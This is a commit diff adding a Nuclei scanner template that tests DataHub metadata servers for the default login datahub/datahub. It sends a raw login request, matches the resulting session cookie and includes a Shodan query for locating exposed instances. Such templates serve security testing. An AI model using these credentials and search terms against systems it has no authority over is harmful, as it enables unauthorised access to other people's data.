Merge pull request #6010 from projectdiscovery/datahub-metadata-default-login

Create datahub-metadata-default-login.yaml

default-logins/datahub/datahub-metadata-default-login.yaml

@@ -0,0 +1,40 @@
+id: datahub-metadata-default-login
+
+info:
+  name: DataHub Metadata Default Login
+  author: queencitycyber
+  severity: high
+  reference:
+    - https://github.com/datahub-project/datahub/blob/master/docs/rfc/active/access-control/access-control.md
+  metadata:
+    verified: true
+    shodan-query: http.title:"DataHub"
+  tags: datahub,default-login
+
+requests:
+  - raw:
+      - |
+        POST /logIn HTTP/2
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"username":"{{username}}","password":"{{password}}"}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - datahub
+      password:
+        - datahub
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'Set-Cookie: actor=urn:li:corpuser:datahub;'
+        condition: and
+
+      - type: status
+        status:
+          - 200